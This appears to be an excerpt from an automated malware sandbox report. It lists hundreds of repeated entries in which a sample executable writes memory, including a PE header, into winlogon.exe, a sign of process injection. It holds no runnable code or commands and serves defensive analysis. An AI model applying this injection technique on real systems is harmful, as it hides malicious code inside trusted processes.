Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D5A0000 value starts with: 4D5AJump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: 400000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: 401000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: 412000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: 414000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: 416000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C940000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C941000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C952000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C954000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C956000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C960000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C961000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C972000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C974000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C976000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C980000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C981000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C992000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C994000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C996000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9A0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9A1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9B2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9B4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9B6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9C0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9C1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9D2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9D4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9D6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9E0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9E1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9F2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9F4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: C9F6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CA96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CB96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CC96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CD96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CED2000Jump to behavior
